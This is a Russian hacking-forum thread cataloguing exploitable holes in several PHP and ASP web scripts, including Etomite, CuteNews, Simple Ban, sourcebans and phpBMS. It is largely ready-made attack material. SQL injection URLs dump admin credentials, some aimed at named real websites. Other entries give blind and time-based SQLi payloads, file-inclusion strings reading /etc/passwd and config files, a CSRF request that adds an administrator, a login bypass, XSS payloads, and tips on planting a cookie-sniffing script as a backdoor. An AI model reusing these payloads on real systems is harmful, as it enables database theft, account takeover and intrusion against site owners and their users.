Форум АНТИЧАТ - Энциклопедия уязвимых скриптов

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - Энциклопедия уязвимых скриптов (https://forum.antichat.xyz/showthread.php?t=19997)

Cifshanghai Script

Download: http://www.cifshanghai.com/
Vuln File: new.php
Exploit:

Код:

http://localhost/[path]/new.php?id=[SQL]

POC:

Цитата:

http://www.vennas.com/new.php?id=-1%20union%20select%201,2,3,4,group_concat(name,0x3 a,password)%20from%20fk_admin--
http://www.nicefurniture.com.cn/new.php?id=-20%20union%20select%201,2,3,4,5,6,group_concat(nam e,0x3a,password),8%20from%20fk_admin-

Etomite CMS Blind Sql injection, чтения локальных файлов
Производитель:http://www.etomite.org/
Продукт:Etomite CMS
Версия:1.1
Чтения локальных файлов(постом или при registr_globals on гетом и magic_quotes_gpc off):

PHP код:


		
			
http://www.hsc.org/manager/actions/static/document_data.static.action.php?id=../../../../../includes/config.inc.php%00

Blind Sql injection
Иньекция в Referer, вернее в path(manager/includes/visitor_logging.inc.php(101)):

PHP код:


		
			
$referer = urldecode($_SERVER['HTTP_REFERER']);

if(empty($referer)) {

  $referer = "Unknown";

} else {

  $pieces = parse_url($referer);

    $referer = $pieces['scheme']."://".$pieces['host'].$pieces['path'];

}



...........................



$sql = "REPLACE INTO $tbl(id, data) VALUES('".$ref."', '".$referer."')";//206

пример реферера для blind:

PHP код:


		
			
http://asdasdasdads.com/%27 or 1=IF(ASCII(SUBSTRING((SELECT username FROM etomite.etomite_manager_users where id = 1),1,1))>96,0,(select 1 union select 5)))--+

необходимо знать префикс и имя базы данных(без нее выпадаем в ошибку)

CuteNews
CSRF:

Код:

http://localhost/cutenews/index.php



POST /cutenews/index.php HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer: http://localhost/cutenews/index.php?mod=editusers&action=list

Cookie: lastusername=underwater; username=underwater; md5_password=xxx;

Content-Type: application/x-www-form-urlencoded

Content-Length: 128

regusername=underwater&regpassword=_123456&regnickname=underwater&regemail=underwater%40gmail.com&reglevel=1&action=adduser&mod=editusers

Код:

http://localhost/cutenews/index.php?regusername=underwater&regpassword=_123456&regnickname=underwater&regemail=underwater%40gmail.com&reglevel=1&action=adduser&mod=editusers

Цитата:

Пользователь Добавлен

Пользователь underwater был успешно добавлен в качестве администратора

вернуться

Про шелл уже не стал писать:=\

Уязвимости Simple Ban
download: http://boedesign.com/downloads/simpleban_v1.5.zip

Blind SQL-injection(требования: magic_quotes=off)
updatenote.php

уязвимый код:

PHP код:


		
			
$id = $_GET["fieldname"];

$note = $_GET["content"];

mysql_query("UPDATE notes SET note='$note' WHERE id='$id'") or die ("I could not insert");

эксплуатирование:

Код:

updatenote.php?content=9999'+or+if(ascii(substring((select+concat_ws(0x3a,user,pass)+from+admin),1,1))>1,BENCHMARK(2000000,md5(current_date)),2)--+

в случае истинности условия получаем небольшую задержку

bypass(требования: magic_quotes=off)
login.php
уязвимый код:

PHP код:


		
			
$user = $_POST['user'];

$pass = $_POST['pass'];



if($_POST['login']){

    // QUERY ADMIN DATABASE

    $getlogin = "SELECT * FROM admin WHERE user='$user' and pass='$pass'";

    $getlogin2 = mysql_query($getlogin);

эксплуатирование:
логинимся с именем:
' or 1=1--

(с) Iceangel_

Цитата:

Сообщение от bug1z

skillz CMS XSS
В поле Поиск по сайту:
"><script>alert(111)</script>

Код:

http://www.skillz.ru/index.php?search=%22%3E%3Cscript%3Ealert%28111%29%3C%2Fscript%3E&m=search

LFI(требования: register_globals=on)
/forums/profile.php

Переменая $phpEx, судя по коду, должна была определятся в extension.inc, но разработчик по невнимательности, не включил в файл в дистрибутив, вследствии имеем возможность определить переменную и получить локальный инклуд
уязвимый код:

PHP код:


		
			
define('IN_PHPBB', true);

$phpbb_root_path = './';

include($phpbb_root_path . 'extension.inc');

include($phpbb_root_path . 'common.'.$phpEx);

эксплуатирование:

Код:

/forums/profile.php?phpEx=../../../../../../../../../../../etc/passwd

(с) Iceangel_

Уязвимости Potato News 1.0.2

Уязвимости Potato News 1.0.2
download: http://potato-news.googlecode.com/files/potatonews-1.0.2.zip

LFI
(требования: register_globals=on)
/timeago.php
уязвимый код:

PHP код:


		
			
if (file_exists("data/comments/$nid.ip.php")) {

include("data/comments/$nid.ip.php");

эксплуатирование:

Код:

/timeago.php?nid=../../../../../../../../../../../../etc/passwd

(с) Iceangel_

Программа: WebEyes Guest Book 3

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «mesajid» сценарием yorum.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://[website]/[script]/yorum.asp?mesajid=11+union+select+0+from+msysobjec ts

поисковик TSEP <=0.942.02
http://milw0rm.com/exploits/9057

Обзор уязвимостей sourcebans

Sourcebans - комплекс банов на игровых серверах (если сервер есть в списке и ркон к нему подходит (не буду объяснять что такое ркон))

Офф сайт: sourcebans.net

Статистика уязвимостей

Всего уязвимостей найденно: 5
XSS: 3
MySql Error: 1
Плохая проверка данных: 1

1. ACTIVE XSS

Уязвимая страница: sait.ru/index.php?p=submit
Проблемный файл: pages/page.submit.php

Уязвимые поля: Comments/Комменты, Players IP/Айпи игроков, STEAM_ID

Описание:
Подставляем в уязв. поля алерт, и он срабатывает у админа если он зайдет в bans (управление банами)
Минус что если по почте придет отчет что бан добавлен то будут детали бана в письме и так пропалят xss

Автор уязвимости: .wolmer
Версии: во всех версиях до 1.4.5 (включительно 1.4.5)

2.ACTIVE XSS 2

Уязвимая страница: sait.ru/index.php
Проблемный файл: Точно не известно

Уязвимые поля: Intro Title

Описание:
В случае если вы потеряли взломанный аккаунт то его можно контролировать если вы заранее подставили скрипт на сниффер в поле "Intro Title" но опять таки админ может пропалить :)

Автор уязвимости: .wolmer
Версии: во всех версиях до 1.4.2 (включительно 1.4.2)(скорее всего и в 1.4.3 так как прикрывают токо паблик уязвимости(сам не тестил в версии 1.4.3/1.4.4/1.4.5))(указанные баги найденны за 3 дня и в паблике не обнаруживались)

3.ACTIVE XSS 3

Уязвимая страница: sait.ru/index.php?p=admin&c=mods
Проблемный файл: pages/admin.edit.mod.php

Уязвимые поля: Mod Name, Mod Folder

Описание:
Не достаточная обработка входных данных, в связи с этим возможна ACTIVE XSS в выводе модов а так же в выводе серверов в админке! Можно использовать как бекдор для в случае если аккаунт потерян

Автор уязвимости: .wolmer
Версии: во всех версиях до 1.4.5 (включительно 1.4.5)

4. MySql Error

Уязвимая страница: sait.ru/index.php?p=submit
Проблемный файл: pages/page.submit.php

Уязвимые параметры: <select id="server" name="server"> в выборе серверов, сам параметр value

Описание:
Описания нету

Автор уязвимости: .wolmer
Версии: во всех версиях до 1.4.5 (включительно 1.4.5)

5. Не достаточная проверка данных

Уязвимая страница: sait.ru/index.php
Проблемный файл: includes/sb-callback.php

Уязвимые параметры: отсуствуют

Описание:
Не достаточная обработка при смене емаила
Ничего не проверяется, следовательно можно получить полный доступ сменив емаил админа (поменяв ID админа в параметре поста xajaxargs[])
Для того чтобы сменить емаил удаленно просто надо поснифать http пакеты на локальном хосте (когда меняем емаил) и отправить их на указанный адрес в интернете (где расположен двиг. sourcebans)

Автор уязвимости: Mr. Anonymous
Версии: во всех версиях до 1.4.2 (включительно 1.4.2)

На этом у меня все, в следующем обзоре уязв. sourcebans попробую рассказать про заливку шелла и про многие другие уязвимости этого движка

phpBMS v0.96
половина скриптов в дирах

Код:

phpBMS v0.96

phpbms.org



eLwaux(c)2009, uasc.org.ua

http://phpbms.org/trial/





## ## ##

SQL Inj

-----------------------------------------------------------------------------------------------

        $querystatement="SELECT

if(discounts.type+0=1,concat(discounts.value,\"%\"),discounts.value)

                  AS value FROM discounts WHERE id=".$_GET["id"];

        $queryresult = $db->query($querystatement);

-----------------------------------------------------------------------------------------------

PoC: /modules/bms/invoices_discount_ajax.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database())







## ## ##

SQL Inj

\dbgraphic.php

-----------------------------------------------------------------------------------------------

        $querystatement="SELECT ".$_GET["f"].",".$_GET["mf"]." FROM

".$_GET["t"]." WHERE id=".$_GET["r"];

        $queryresult=$db->query($querystatement);

-----------------------------------------------------------------------------------------------

PoC: \dbgraphic.php?f=concat_ws(id,login,password)&mf=1&t=users&r=1





## ## ##

SQL Inj

-----------------------------------------------------------------------------------------------

        if(isset($_GET["cmd"])){

                switch($_GET["cmd"]){

                        case "show":

                                showSearch($_GET["tid"],$_GET["base"],$db);

                        break;

                }//end switch

-----------------------------------------------------------------------------------------------

PoC:

        /advancedsearch.php?cmd=show&tid=-1+union+select+login+from+users&base=2

        /advancedsearch.php?cmd=show&tid=-1+union+select+password+from+users&base=2





## ## ##

pXSS

-----------------------------------------------------------------------------------------------

        <form name="form1" method="post" action="<?php echo

$_SERVER["PHP_SELF"]?>">

-----------------------------------------------------------------------------------------------

PoC:

     \index.php/"><script>alert(/xss/);</script><div id="

     \modules\base\myaccount.php/"><script>alert(/xss/);</script><div id="

     \phpbms\modules\base\modules_view.php"><script>alert(/xss/);</script><div

id="

     \phpbms\modules\base\tabledefs_options.php\">{XSS}

     \phpbms\modules\base\adminsettings.php\">{XSS}





## ## ##

Path Disclosure

     /footer.php

     /header.php

     /advancedsearch.php?cmd=show&

     /choicelist.php